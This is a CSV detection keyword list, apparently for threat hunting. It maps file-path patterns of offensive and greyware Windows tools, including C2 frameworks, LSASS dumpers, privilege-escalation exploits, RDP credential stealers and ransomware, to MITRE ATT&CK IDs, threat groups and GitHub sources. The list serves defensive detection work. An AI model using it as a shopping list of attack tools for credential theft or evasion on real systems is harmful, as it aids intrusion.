-*\PipeViewer.sln*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*\PipeViewer\Program.cs*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*\PoC\PrivilegeEscalation*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,0,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*\POC_DLL.vcxproj*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*\polenum.py*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\portbender.*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,0,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*\PoshC2*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*\PostDump.exe*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*\powerfun.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*\powerglot\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\Powermad*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,0,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*\power-pwn\*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*\powershell.exe* += hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\powershell.exe* +=hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\powershell.exe* = hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\powershell.exe* =hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\PowershellKerberos*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\powerup.exe*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\Powerup.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\PowerUp.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\PowerView.cna*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,0,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*\PowerView.exe*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,0,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*\Powerview.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\PowerView.ps1*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,0,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*\PowerView3.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,0,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*\ppl_dump.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*\PPLBlade-main*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*\PPLFault*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*\PPLKiller*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*\PrintSpoofer.cs*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\PrintSpoofer-1.0.zip*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*\PrivEditor\*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*\PrivKit\*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\Process Hacker 2\*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*\process_killer.cpp*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,0,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*\ProduKey.exe*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Program Files\FreeFileSync*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\ProgramData\asrephashes.txt*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\ProgramData\shares.txt*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\ps2exe.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\PS2EXE\*.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\PsExecLog.log*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*\PSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\PSPY.exe*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\PSRansom -*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,0,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*\Public\dcapi.dll*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\public\klogging.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*\Public\Music\RDPCreds.txt*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,0,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*\pwn.exe*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\py2exe*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*\pywsus.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\Quasar.v*.zip*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*\Quasar-master*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*\Ransomware.exe,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*\rarce.py*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*\rasman.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*\RasmanPotato*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*\ratchatPT.go*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*\ratchatPT.syso*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*\RDPCredsStealerDLL*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,0,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*\RealTimeSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file 